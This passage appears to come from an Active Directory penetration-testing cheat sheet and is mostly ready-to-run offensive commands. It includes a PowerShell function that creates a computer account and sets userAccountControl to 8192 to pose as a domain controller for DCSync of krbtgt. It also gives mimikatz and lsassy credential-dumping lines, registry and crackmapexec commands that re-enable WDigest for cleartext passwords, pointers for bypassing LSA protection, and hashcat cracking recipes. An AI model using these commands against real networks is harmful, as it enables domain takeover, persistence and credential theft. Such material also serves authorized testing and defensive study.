New-MachineAccount -MachineAccount newMachine01 -Domain company.local -DomainController dc01.company.local

By default new computer will have primary group ID 515 (RID for domain groups and represents that this is a domain computer)

If you can modify the userAccountControl an therefore change the primary group ID. This attribute would be modified to have a value of 8192 the primary group id will change to 516 which belongs to domain controllers.

Set-ADComputer newMachine01 -replace @{ "userAccountcontrol" = 8192 }

Most important bit of having a computer account to act as a domain controller is that the DCSync can be used on that arbitrary account instead of the legitimate domain controller.

Steps:

  1. Creation a machine account
  2. Modifying userAccountControl to 8192
  3. Computer account is known its NTLM hash could be used to pass the hash (create new cmd.exe, mimikatz...)
  4. Command prompt will open under the context of the machine account --> DCSync KRBTG or whole identities
lsadump::dcsync /domain:purple.lab /user:krbtgt

Automate technique 1:

Add-ServerUntrustAccount -ComputerName "newMachine01" -Password "Password123" -Verbose
Invoke-ServerUntrustAccount -ComputerName "newMachine01" -Password "Password123" -MimikatzPath ".\mimikatz.exe"

Automate technique 2: PowerShell script to automate domain persistence via the userAccountControl active directory attribute.

function Execute-userAccountControl
{
[CmdletBinding()]
        param
        (
                [System.String]$DomainFQDN = $ENV:USERDNSDOMAIN,
                [System.String]$ComputerName = 'Pentestlab',
                [System.String]$OSVersion = '10.0 (18363)',
                [System.String]$OS = 'Windows 10 Enterprise',
                [System.String]$DNSName = "$ComputerName.$DomainFQDN",
$MachineAccount = 'Pentestlab'
        )
$secureString = convertto-securestring "Password123" -asplaintext -force
$VerbosePreference = "Continue"

Write-Verbose -Message "Creating Computer Account: $ComputerName"
New-ADComputer $ComputerName -AccountPassword $securestring -Enabled $true -OperatingSystem $OS -OperatingSystemVersion $OS_Version -DNSHostName
$DNSName -ErrorAction Stop;
Write-Verbose -Message "$ComputerName created!"
Write-Verbose -Message "Attempting to establish persistence."
Write-Verbose -Message "Changing the userAccountControl attribute of $MachineAccount computer to 8192."
Set-ADComputer $MachineAccount -replace @{ "userAccountcontrol" = 8192 };
Write-Verbose -Message "$MachineAccount is now a Domain Controller!"
Write-Verbose -Message "Domain persistence established!You can now use the DCSync technique with Pentestlab credentials."
$VerbosePreference = "Continue"
}

Post-Exploitation

Computer accounts privesc

For example, if an admin server is joined to a group with backup rights on Domain Controllers, all an attacker needs to do is compromise an admin account with rights to that admin server and then get System rights on that admin server to compromise the domain.

  1. Compromise an account with admin rights to admin server.
  2. Admin server computer account needs rights to Domain Controllers.

Extract NTDS

Extract NTDS without Admin priv

Multiple ways to extract NTDS

Active Directory NTDS : Clear Text passwords (Reversible encryption)

Sometimes when using secretsdump.py to extract NTDS.dit you will encounter some CLEARTEXT credential wihtin the dump.

Cleartext does not really mean that the passwords are stored as is. They are stored in an encrypted form using RC4 encryption.

The key used to both encrypt and decrypt is the SYSKEY, which is stored in the registry and can be extracted by a domain admin.This means the hashes can be trivially reversed to the cleartext values, hence the term “reversible encryption”.

List users with "Store passwords using reversible encryption" enabled

Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl

--> list of user account control flag :

DCSYNC

Accessing LSASS secrets

Lsassy
lsassy -d company.local -u jdoe -p Pass1234 192.168.1.0/24

Bring Your Own Domain Controller

Misc : AD Audit

WDigest

Wdigest was introduced in WinXP and designed to be used with HTTP protocol for authentication.

Enabled by default in multiple versions of Windows:

  • Windows XP
  • Windows 8.0
  • Server 2003
  • Server 2008
  • Server 2012

--> With WDigest plain text passwords are stored in LSASS.

Retrieving using Mimikatz

sekurlsa::wdigest

Can be deactivated/activated setting to 1 the value of UseLogonCredential and Negotiate in HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest.
--> If these registry keys don't exist or the value is "0", then WDigest will be deactivated.

reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v Negotiate

As an attacker you can reactivate WDigest to get cleartext credentials on sensitive systems.

crackmapexec smb 192.168.0.10 -u jdoe -p Pass123 -M wdigest -o ACTION=enable

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

Passwords stored in LSA (LSA Storage)

Since Windows 8.1 you can protect LSA storage using Protected Process (RunAsPPL).
--> This will prevent regular mimikatz.exe sekurlsa:logonpasswords for working properly.

With this registry key enable, the following 3 actions (which require an handle on LSASS ) will no longer be possible:

sekurlsa:logonpasswords
lsadump::lsa: Did not work
sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlmhash>

With this registry key enable, the following 5 actions will still be possible:

lsadump::dcsync /domain:<domain> /user:<user>
lsadump::secrets (get syskey information to decrypt secrets from the registry on disk)
lsadump::sam (Reading credentials from the SAM on disk)
kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /krbtgt:<krbtgt hash> /endin:<value> /renewmax:<value>
keystroke logging

Validate RunAsPPL is enable

reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL

Documentation about LSA secrets: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23

--> Mimikatz has the mimidrv.sys driver that can bypass LSA Protection. Pretty much flag everywhere you will need to write you own driver. - https://posts.specterops.io/mimidrv-in-depth-4d273d19e148 --> You can also build your own driver and sign it digitally
--> You can also load an official and vulnerable driver that can be exploited to run arbitrary code in the Kernel
- https://github.com/fengjixuchui/gdrv-loader
- https://github.com/RedCursorSecurityConsulting/PPLKiller - https://gorkemkaradeniz.medium.com/defeating-runasppl-utilizing-vulnerable-drivers-to-read-lsass-with-mimikatz-28f4b50b1de5 --> Use other process (e.g Antivirus process) which sometimes have already handles on LSASS process
- https://skelsec.medium.com/duping-av-with-handles-537ef985eb03

Abusing leaked handles to dump LSASS memory

LM password storage

LM hash is an old deprecated method of storing passwords which has the following weaknesses:

  • Password length is limited to 14 characters
  • Passwords that are longer than 7 characters are split into two and each half is hashed separately
  • All lower-case characters are converted to upper-case before hashing
grep -iv ':aad3b435b51404eeaad3b435b51404ee:' ntds.dit

Storing passwords using reversible encryption

Inactive domain accounts

sort -t ';' -k 8 domain_users.grep | grep -v ACCOUNT_DISABLED | awk -F ';' '{print $3, $8}'

Privileged users with password reset overdue

Once the dumping is done (ldapdomaindump), get the list of users with AdminCount attribute set to 1 by parsing the ‘domain_users.json’ file:

jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json > privileged_users.txt

Then iterate through the list of privileged users, display their last password reset date (pwdLastSet) and sort it:

while read user; do grep ";${user};" domain_users.grep; done < privileged_users.txt | \
  grep -v ACCOUNT_DISABLED | sort -t ';' -k 10 | awk -F ';' '{print $3, $10}'

Users with non-expiring passwords

grep DONT_EXPIRE_PASSWD domain_users.grep | grep -v ACCOUNT_DISABLED

Service account within privileged groups

net group "Schema Admins" /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain

AdminCount on regular users

jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json

Data-Exfiltration

Data exfiltration and DLP (Data Loss Prevention) bypass.

Cracking Hashes

Extracting hash (john format) from password protected file like Word, Excel, 7z, SSH, truecrypt

ssh2john.py id_rsa > ssh-hash.txt
john ssh-hash.txt --wordlist=/usr/share/wordlists/rockyou_2021.txt

LM hash

hashcat -m 3000 -a 0 lm_hashes.txt ../../wordlists/rockyou_2021.txt

NTLM hash

Hashcat mask attack

hashcat -m 1000 -a 3 ntds.dit.ntds ?u?l?l?l?l?d?d?d?d?s

Hashcat rule based cracking

hashcat -m 1000 -a 0 --username ntds.dit.ntds ../../wordlists/rockyou_2021.txt -r ../../wordlists/OneRuleToRuleThemAll.rule

Hashcat wordlist cracking

hashcat -m 1000 -a 0 --username ntds.dit.ntds ../../wordlists/rockyou_2021.txt

Net-NTLMv1

hashcat -m 5500 -a 0 ntlmv1_hashes.txt ../../wordlists/rockyou_2021.txt

Net-NTLMv2

hashcat -m 5600 -a 0 ntlmv2_hashes.txt ../../wordlists/rockyou_2021.txt

AS-Rep Roast response (Kerberos 5 AS-REP etype 23)

hashcat -m 18200 -a 0 AS_REP_responses_hashes.txt ../../wordlists/rockyou_2021.txt

Kerberoast (Service Ticket)

hashcat -m 13100 -a 0 TGS_hashes.txt ../../wordlists/rockyou_2021.txt

Kerberos 5 TGS (AES128)

hashcat -m 19600 -a 0 TGS_hashes.txt ../../wordlists/rockyou_2021.txt

Kerberos 5 TGS (AES256)

hashcat -m 19700 -a 0 TGS_hashes.txt ../../wordlists/rockyou_2021.txt

MsCache 2 (DCC2)

Slow to be cracked due to PBKDF2 usage (PBKDF2(HMAC-SHA1, 10240, DCC1, username)

hashcat -m 2100 -a 0 DCC2_hashes.txt ../../wordlists/rockyou_2021.txt

Reporting / Collaborative

PlumHound

Pwndoc

Password audit reporting

dpat.py -n ntds.dit -c hashcat.potfile -g "Domain Admins.txt" "Enterprise Admins.txt"

Defenses

Restricted Admin Mode

Windows Defender Antivirus

AppLocker

Rules: Are defined and control execution of the followings items:

  • Applications
  • Scripts
  • Packaged Applications
  • Installers
  • DLL

Conditions: Are based on the followings filters:

  • Publisher (Ex: Software signed by valid vendor)
  • Path
  • File hash

--> Finally : Allow and Deny actions can be assigned to specific user/group.

Windows Defender Application Control (WDAC)

Windows Defender Advanced Threat Protection (ATP)

Windows Defender : Exploit Guard

Windows Defender : Application Guard

Windows Defender : Device Guard

Windows Defender : Credential Guard

Resources

Steve Syfuhs blog

Red Team Cheatsheet

OCD - AD Mind Map

PetitPotam and ADCS

Active Directory Exploitation cheatsheet

Attacking Active Directory

Kerberos Delegation

Exceptional blog posts regarding Windows Authentication/Credentials/RDP

Windows Logon Types

Windows Name Pipes

COM / DCOM

PowerShell Without PowerShell

Tools:

To do

LAPS, JEA, WSL, RBCD, WDAC, ASR, AWL, Credential Guard, CLM, virtualization